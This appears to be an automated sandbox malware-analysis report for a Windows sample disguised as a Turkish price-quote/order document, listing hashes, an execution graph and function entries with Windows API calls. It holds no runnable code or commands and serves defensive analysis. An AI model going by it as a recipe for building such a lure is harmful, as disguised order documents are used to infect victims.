                                                                                      Imagebase:0xe40000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.3%
                                                                                        Dynamic/Decrypted Code Coverage:96.5%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:85
                                                                                        Total number of Limit Nodes:5
                                                                                        execution_graph 25201 cedca8 DuplicateHandle 25202 cedd3e 25201->25202 25203 ce4668 25204 ce4672 25203->25204 25206 ce4759 25203->25206 25207 ce477d 25206->25207 25211 ce4868 25207->25211 25215 ce4859 25207->25215 25212 ce488f 25211->25212 25213 ce496c 25212->25213 25219 ce44c4 25212->25219 25217 ce488f 25215->25217 25216 ce496c 25216->25216 25217->25216 25218 ce44c4 CreateActCtxA 25217->25218 25218->25216 25220 ce58f8 CreateActCtxA 25219->25220 25222 ce59bb 25220->25222 25189 4aa2330 25190 4aa2398 CreateWindowExW 25189->25190 25192 4aa2454 25190->25192 25192->25192 25127 90d01c 25128 90d034 25127->25128 25129 90d08e 25128->25129 25134 4aa24e8 25128->25134 25138 4aa176c 25128->25138 25147 4aa3248 25128->25147 25156 4aa24d8 25128->25156 25135 4aa250e 25134->25135 25136 4aa176c CallWindowProcW 25135->25136 25137 4aa252f 25136->25137 25137->25129 25139 4aa1777 25138->25139 25140 4aa32b9 25139->25140 25142 4aa32a9 25139->25142 25176 4aa1894 25140->25176 25160 4aa34ac 25142->25160 25166 4aa33d1 25142->25166 25171 4aa33e0 25142->25171 25143 4aa32b7 25150 4aa3285 25147->25150 25148 4aa32b9 25149 4aa1894 CallWindowProcW 25148->25149 25151 4aa32b7 25149->25151 25150->25148 25152 4aa32a9 25150->25152 25153 4aa34ac CallWindowProcW 25152->25153 25154 4aa33e0 CallWindowProcW 25152->25154 25155 4aa33d1 CallWindowProcW 25152->25155 25153->25151 25154->25151 25155->25151 25157 4aa250e 25156->25157 25158 4aa176c CallWindowProcW 25157->25158 25159 4aa252f 25158->25159 25159->25129 25161 4aa34ba 25160->25161 25162 4aa346a 25160->25162 25180 4aa3488 25162->25180 25183 4aa3498 25162->25183 25163 4aa3480 25163->25143 25168 4aa33f4 25166->25168 25167 4aa3480 25167->25143 25169 4aa3488 CallWindowProcW 25168->25169 25170 4aa3498 CallWindowProcW 25168->25170 25169->25167 25170->25167 25173 4aa33f4 25171->25173 25172 4aa3480 25172->25143 25174 4aa3488 CallWindowProcW 25173->25174 25175 4aa3498 CallWindowProcW 25173->25175 25174->25172 25175->25172 25177 4aa189f 25176->25177 25178 4aa499a CallWindowProcW 25177->25178 25179 4aa4949 25177->25179 25178->25179 25179->25143 25181 4aa34a9 25180->25181 25186 4aa48b9 25180->25186 25181->25163 25184 4aa34a9 25183->25184 25185 4aa48b9 CallWindowProcW 25183->25185 25184->25163 25185->25184 25187 4aa1894 CallWindowProcW 25186->25187 25188 4aa48ea 25187->25188 25188->25181 25193 ceb6d0 25194 ceb6df 25193->25194 25196 ceb7b7 25193->25196 25197 ceb7fc 25196->25197 25198 ceb7d9 25196->25198 25197->25194 25198->25197 25199 ceba00 GetModuleHandleW 25198->25199 25200 ceba2d 25199->25200 25200->25194 25223 ceda60 25224 cedaa6 GetCurrentProcess 25223->25224 25226 cedaf8 GetCurrentThread 25224->25226 25227 cedaf1 25224->25227 25228 cedb2e 25226->25228 25229 cedb35 GetCurrentProcess 25226->25229 25227->25226 25228->25229 25230 cedb6b GetCurrentThreadId 25229->25230 25232 cedbc4 25230->25232

                                                                                        Executed Functions

                                                                                        Function 04AA7490 Relevance: 9.3, Strings: 7, Instructions: 502COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1521105117.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4aa0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 'Aq$)$/$4'q$K$]$$Aq
                                                                                        • API String ID: 0-841784018
                                                                                        • Opcode ID: 7db4fed59292bce7253df46c41938503ca4dd620383c827b3039fd170a005044
                                                                                        • Instruction ID: fd59076a5a95d09fb9c6b5f567f3f1fecfa71e1727724181d8d2ba0a061d76f1
                                                                                        • Opcode Fuzzy Hash: 7db4fed59292bce7253df46c41938503ca4dd620383c827b3039fd170a005044
                                                                                        • Instruction Fuzzy Hash: 5D227B34A007048FDB14EF74C88469E77B2FF89304F1585B9E809AF365DB75A94ACB91
                                                                                        Function 04AA7480 Relevance: 9.2, Strings: 7, Instructions: 475COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 439 4aa7480-4aa74fe 447 4aa7508-4aa750c call 4aa7304 439->447 449 4aa7511-4aa751c 447->449 451 4aa7526-4aa752a call 4aa7314 449->451 453 4aa752f-4aa75ac call 4aa7324 call 4aa7334 call 4aa7324 451->453 468 4aa75b3-4aa75c4 call 4aa7344 453->468 470 4aa75c9-4aa760b call 4aa7354 call 4aa7364 468->470 474 4aa7610-4aa761a call 4aa7374 470->474 476 4aa761f-4aa766a call 4aa7384 call 4aa7394 474->476 483 4aa766f-4aa767c 476->483 582 4aa767f call 4aabf88 483->582 583 4aa767f call 4aabf98 483->583 484 4aa7682-4aa76c4 call 4aa7344 call 4aa7354 488 4aa76c9-4aa76f8 call 4aa7364 484->488 490 4aa76fd-4aa778d call 4aa7374 488->490 501 4aa7794-4aa779b 490->501 502 4aa77a3-4aa77b8 501->502 504 4aa77be-4aa77d7 502->504 505 4aa7bd2 502->505 504->505 508 4aa77dd-4aa7802 504->508 507 4aa7bd7-4aa7c02 call 4aa7434 505->507 510 4aa7c07-4aa7c17 507->510 508->505 514 4aa7808-4aa782d 508->514 514->505 517 4aa7833-4aa7880 514->517 524 4aa7887-4aa7898 517->524 525 4aa78a0-4aa78a2 524->525 526 4aa78ba-4aa78be 525->526 527 4aa78a4-4aa78aa 525->527 530 4aa78c4-4aa78c8 526->530 528 4aa78ae-4aa78b0 527->528 529 4aa78ac 527->529 528->526 529->526 530->505 531 4aa78ce-4aa78d1 530->531 532 4aa78dc 531->532 533 4aa78e8-4aa79cc call 4aa73a4 call 4aa7344 call 4aa7354 call 4aa7364 call 4aa73b4 call 4aa73c4 call 4aa73d4 532->533 551 4aa79d4-4aa79e0 call 4aa73e4 533->551 553 4aa79e5-4aa7a6e call 4aa73f4 call 4aa7404 551->553 562 4aa7a79-4aa7ad0 553->562 564 4aa7ad7-4aa7b08 call 4aa7414 562->564 569 4aa7b0a-4aa7b10 564->569 570 4aa7b20-4aa7bb5 call 4aa7424 call 4aa7354 564->570 571 4aa7b12 569->571 572 4aa7b14-4aa7b16 569->572 580 4aa7bc1-4aa7bc3 570->580 571->570 572->570 581 4aa7bca-4aa7bd1 580->581 582->484 583->484
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1521105117.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4aa0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 'Aq$)$/$4'q$K$]$$Aq
                                                                                        • API String ID: 0-841784018
                                                                                        • Opcode ID: 462a52c39afcbd1d80da38b2b1f91bc8a448c45d8f41c5eb8486d64fd44d799d
                                                                                        • Instruction ID: 6b64c4dfd3967595f19ab34a95ba242bffabce2f07da681b12b247d5767135de
                                                                                        • Opcode Fuzzy Hash: 462a52c39afcbd1d80da38b2b1f91bc8a448c45d8f41c5eb8486d64fd44d799d
                                                                                        • Instruction Fuzzy Hash: A6127B34A007048FDB14EF74C88469E77B2FF89304F1585B9E809AF365DB35A98ACB91
                                                                                        Function 04AA0690 Relevance: .3, Instructions: 315COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1521105117.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4aa0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0f90fe37a243512e565f051ed625679d17ed08b9fdf612e30de3f32581945b1a
                                                                                        • Instruction ID: f4ae2ab25c5c1481d14e8372a5f2875b7456880694488384579e8f4ed5dc3932
                                                                                        • Opcode Fuzzy Hash: 0f90fe37a243512e565f051ed625679d17ed08b9fdf612e30de3f32581945b1a
                                                                                        • Instruction Fuzzy Hash: D81261B1C11746ABE714CF65E94C2893BB1FBA5318B90420AD2612E2E5DBBC1DDBCF44
                                                                                        Function 04AA0688 Relevance: .2, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1521105117.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4aa0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 048a0410f0919dccc3ac9f8c479213beefe5a77f04d48a2c7ef73322e290d22e
                                                                                        • Instruction ID: 230d1e679456be350cc2e5345dbe93b723f31857568b77dd630867d15ae4896a
                                                                                        • Opcode Fuzzy Hash: 048a0410f0919dccc3ac9f8c479213beefe5a77f04d48a2c7ef73322e290d22e
                                                                                        • Instruction Fuzzy Hash: EDC1C3B1C11746ABE714CF69E94C2897BB1FBA5324F60420AD2612B2D5DBBC58CBCF44
                                                                                        Function 00CEDA60 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 584 ceda60-cedaef GetCurrentProcess 588 cedaf8-cedb2c GetCurrentThread 584->588 589 cedaf1-cedaf7 584->589 590 cedb2e-cedb34 588->590 591 cedb35-cedb69 GetCurrentProcess 588->591 589->588 590->591 593 cedb6b-cedb71 591->593 594 cedb72-cedb8a 591->594 593->594 597 cedb93-cedbc2 GetCurrentThreadId 594->597 598 cedbcb-cedc2d 597->598 599 cedbc4-cedbca 597->599 599->598
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 00CEDADE
                                                                                        • GetCurrentThread.KERNEL32 ref: 00CEDB1B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 00CEDB58
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00CEDBB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1518407389.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ce0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 436e296fffbb0af32d42a85b66e50a9b5ccff3423c2d307c88886afbe2a6c0a0
                                                                                        • Instruction ID: 541f9553507e16d54355f967a8938a1e2614593236488b53141c453f78293390
                                                                                        • Opcode Fuzzy Hash: 436e296fffbb0af32d42a85b66e50a9b5ccff3423c2d307c88886afbe2a6c0a0
                                                                                        • Instruction Fuzzy Hash: 635188B09003498FEB14DFAAD548B9EBBF1EF48304F208019E419A7350EB78A945CF66
                                                                                        Function 00CEB7B7 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 627 ceb7b7-ceb7d7 628 ceb7d9-ceb7e6 call ceb458 627->628 629 ceb803-ceb807 627->629 634 ceb7fc 628->634 635 ceb7e8 628->635 631 ceb81b-ceb85c 629->631 632 ceb809-ceb813 629->632 638 ceb85e-ceb866 631->638 639 ceb869-ceb877 631->639 632->631 634->629 682 ceb7ee call ceba53 635->682 683 ceb7ee call ceba60 635->683 638->639 640 ceb89b-ceb89d 639->640 641 ceb879-ceb87e 639->641 646 ceb8a0-ceb8a7 640->646 643 ceb889 641->643 644 ceb880-ceb887 call ceb464 641->644 642 ceb7f4-ceb7f6 642->634 645 ceb938-ceb9f8 642->645 648 ceb88b-ceb899 643->648 644->648 677 ceb9fa-ceb9fd 645->677 678 ceba00-ceba2b GetModuleHandleW 645->678 649 ceb8a9-ceb8b1 646->649 650 ceb8b4-ceb8bb 646->650 648->646 649->650 652 ceb8bd-ceb8c5 650->652 653 ceb8c8-ceb8d1 call ceb474 650->653 652->653 658 ceb8de-ceb8e3 653->658 659 ceb8d3-ceb8db 653->659 660 ceb8e5-ceb8ec 658->660 661 ceb901-ceb905 658->661 659->658 660->661 663 ceb8ee-ceb8fe call ceb484 call ceb494 660->663 684 ceb908 call cebd50 661->684 685 ceb908 call cebd60 661->685 663->661 666 ceb90b-ceb90e 668 ceb910-ceb92e 666->668 669 ceb931-ceb937 666->669 668->669 677->678 679 ceba2d-ceba33 678->679 680 ceba34-ceba48 678->680 679->680 682->642 683->642 684->666 685->666
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00CEBA1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1518407389.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ce0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: ce631477612e7675205fc60d2186524d431fd908dd0f5f457b853ecfd385e392
                                                                                        • Instruction ID: 6fa16b4e951de4341f6093941eb5adec1acca42abcc4a32da6a968098693c58c
                                                                                        • Opcode Fuzzy Hash: ce631477612e7675205fc60d2186524d431fd908dd0f5f457b853ecfd385e392
                                                                                        • Instruction Fuzzy Hash: 9A814370A00B458FDB24DF2AD54176BBBF1FF88300F00892DD19ADBA91DB75A946CB91
                                                                                        Function 04AA2325 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 686 4aa2325-4aa2396 687 4aa2398-4aa239e 686->687 688 4aa23a1-4aa23a8 686->688 687->688 689 4aa23aa-4aa23b0 688->689 690 4aa23b3-4aa23eb 688->690 689->690 691 4aa23f3-4aa2452 CreateWindowExW 690->691 692 4aa245b-4aa2493 691->692 693 4aa2454-4aa245a 691->693 697 4aa24a0 692->697 698 4aa2495-4aa2498 692->698 693->692 699 4aa24a1 697->699 698->697 699->699
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04AA2442
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1521105117.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4aa0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 42db8474bc80c838f44fa93fd209243905f8c640333bd45954e2f24633a29ac4
                                                                                        • Instruction ID: 9f4cf94217cec6a3eab203f649dca8d37428879114a526e960850f8e34fafaca
                                                                                        • Opcode Fuzzy Hash: 42db8474bc80c838f44fa93fd209243905f8c640333bd45954e2f24633a29ac4
                                                                                        • Instruction Fuzzy Hash: F251C0B1D103499FDB14CFA9C884ADEBFB5FF48310F24812AE819AB210D775A855CF90
                                                                                        Function 04AA2330 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 700 4aa2330-4aa2396 701 4aa2398-4aa239e 700->701 702 4aa23a1-4aa23a8 700->702 701->702 703 4aa23aa-4aa23b0 702->703 704 4aa23b3-4aa2452 CreateWindowExW 702->704 703->704 706 4aa245b-4aa2493 704->706 707 4aa2454-4aa245a 704->707 711 4aa24a0 706->711 712 4aa2495-4aa2498 706->712 707->706 713 4aa24a1 711->713 712->711 713->713
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04AA2442
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1521105117.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4aa0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: e17bf00b39c74c2c3b6e073c96589d3e899ec6b069b56fd2d6451a3f2b7e9f2a
                                                                                        • Instruction ID: 1861936546fec7ad42e02bb525c8392787ab80b26b517b06edf90fe0dc7764ed
                                                                                        • Opcode Fuzzy Hash: e17bf00b39c74c2c3b6e073c96589d3e899ec6b069b56fd2d6451a3f2b7e9f2a
                                                                                        • Instruction Fuzzy Hash: 7141BEB1D10309AFDB14CF9AC884ADEBBB5FF48310F64812EE819AB250D775A855CF94
                                                                                        Function 04AA1894 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 730 4aa1894-4aa493c 733 4aa49ec-4aa4a0c call 4aa176c 730->733 734 4aa4942-4aa4947 730->734 741 4aa4a0f-4aa4a1c 733->741 736 4aa499a-4aa49d2 CallWindowProcW 734->736 737 4aa4949-4aa4980 734->737 739 4aa49db-4aa49ea 736->739 740 4aa49d4-4aa49da 736->740 743 4aa4989-4aa4998 737->743 744 4aa4982-4aa4988 737->744 739->741 740->739 743->741 744->743
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04AA49C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1521105117.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4aa0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: 2879f1fefe7c318876f024488bf24a988f1c18c5b18cf6589162448e6a9aa546
                                                                                        • Instruction ID: 2e9c1e65d71ebceec207d60c50d0baeccfd914a52cd04b7096a765f21265a5d3
                                                                                        • Opcode Fuzzy Hash: 2879f1fefe7c318876f024488bf24a988f1c18c5b18cf6589162448e6a9aa546
                                                                                        • Instruction Fuzzy Hash: 804138B4A00309DFDB14CF99C488AAAFBF5FB8C314F248459E419AB321D774A851CFA0
                                                                                        Function 00CE58EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 714 ce58ec-ce59b9 CreateActCtxA 716 ce59bb-ce59c1 714->716 717 ce59c2-ce5a1c 714->717 716->717 724 ce5a1e-ce5a21 717->724 725 ce5a2b-ce5a2f 717->725 724->725 726 ce5a40 725->726 727 ce5a31-ce5a3d 725->727 729 ce5a41 726->729 727->726 729->729
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 00CE59A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1518407389.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ce0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 87526db2196294f8b7e4447045b835661a0c770f699a14b4e74d9d781e3c95ac
                                                                                        • Instruction ID: 1be51adde664b56a80add8ade4ea8d5ad1cb7fd8e71566bbe67f8309cfa2a1c4
                                                                                        • Opcode Fuzzy Hash: 87526db2196294f8b7e4447045b835661a0c770f699a14b4e74d9d781e3c95ac
                                                                                        • Instruction Fuzzy Hash: C241F1B1C00759CFEB24DFAAC884B9DBBB6BF48304F20816AD408AB251DB756946CF50
                                                                                        Function 00CE44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 747 ce44c4-ce59b9 CreateActCtxA 750 ce59bb-ce59c1 747->750 751 ce59c2-ce5a1c 747->751 750->751 758 ce5a1e-ce5a21 751->758 759 ce5a2b-ce5a2f 751->759 758->759 760 ce5a40 759->760 761 ce5a31-ce5a3d 759->761 763 ce5a41 760->763 761->760 763->763
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 00CE59A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1518407389.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ce0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: e67da2f2d3c850e9e052216f181da39bf690d8720812238c0e3e03223be9053b
                                                                                        • Instruction ID: f736e6f57995ee695a71c27f6729024ceedfdde1dccd27693c9540eb53999c5e
                                                                                        • Opcode Fuzzy Hash: e67da2f2d3c850e9e052216f181da39bf690d8720812238c0e3e03223be9053b
                                                                                        • Instruction Fuzzy Hash: C641E471C0075DDBEB24DFAAC844B9DBBF6BF48304F20816AD408AB251DB756946CF90
                                                                                        Function 00CEDCA8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 764 cedca8-cedd3c DuplicateHandle 765 cedd3e-cedd44 764->765 766 cedd45-cedd62 764->766 765->766
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CEDD2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1518407389.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ce0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 94840814256ef64755b058b6678463a00a617b6b964ef1286661d574c1393978
                                                                                        • Instruction ID: 7625532c22e2fce28ae626e07826d5ca36f89dcef0c49e066c1efcfb6906879a
                                                                                        • Opcode Fuzzy Hash: 94840814256ef64755b058b6678463a00a617b6b964ef1286661d574c1393978
                                                                                        • Instruction Fuzzy Hash: 9921E4B5D002499FDB10CF9AD884ADEFBF4EB48310F14841AE915A7350D374A941CF64
                                                                                        Function 00CEB9B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 769 ceb9b8-ceb9f8 770 ceb9fa-ceb9fd 769->770 771 ceba00-ceba2b GetModuleHandleW 769->771 770->771 772 ceba2d-ceba33 771->772 773 ceba34-ceba48 771->773 772->773
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00CEBA1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1518407389.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ce0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 12def51a58c27b3e4886885e764d0c45872745fb2f1f1b949755ea3376328f42
                                                                                        • Instruction ID: 27bc3d8db7a3187db3ee14ce7c5d7ea5fee639836f30c72892af0b4d3aac2f47
                                                                                        • Opcode Fuzzy Hash: 12def51a58c27b3e4886885e764d0c45872745fb2f1f1b949755ea3376328f42
                                                                                        • Instruction Fuzzy Hash: 7A11DFB5C006498FDB20DF9AD444AAEFBF5EB88324F10842AD429A7250C779A945CFA5
                                                                                        Function 008FD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1517816998.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_8fd000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f4825d81ad7a20510983523c877446360454ee86fbec306d8b829bc5ae159632
                                                                                        • Instruction ID: 345adeb417cbd7a7bc8e8f15aa16d8cb60362c359b97dc50e839a63aefcae8a5
                                                                                        • Opcode Fuzzy Hash: f4825d81ad7a20510983523c877446360454ee86fbec306d8b829bc5ae159632
                                                                                        • Instruction Fuzzy Hash: AC212871504308DFDB14DF20D9C4B26BB66FBA4324F20C169DB098F256C336E856CBA2
                                                                                        Function 0090D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1517947807.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_90d000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b6b3af36165226dc5f6345044241af8d7a201eea0741b9f1af66bc4b96e63a0
                                                                                        • Instruction ID: 36e77b6a5847b714fc7edd4d1a13e2135150877fa5602dc488c6d375d1e07e4c
                                                                                        • Opcode Fuzzy Hash: 6b6b3af36165226dc5f6345044241af8d7a201eea0741b9f1af66bc4b96e63a0
                                                                                        • Instruction Fuzzy Hash: 69210771605300EFDB15DF98D9C0B25BB65FB84314F20C96DE8494B2D6C33AD846CB61
                                                                                        Function 0090D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1517947807.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_90d000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f00b905c568a0b697ea51858cf2f429eab873c3ed4bd0254cece8987dd390b45
                                                                                        • Instruction ID: 8237fd84bbc66ca6e00512538449576f9e0785d266c5358aee21eaaaafd0f12d
                                                                                        • Opcode Fuzzy Hash: f00b905c568a0b697ea51858cf2f429eab873c3ed4bd0254cece8987dd390b45
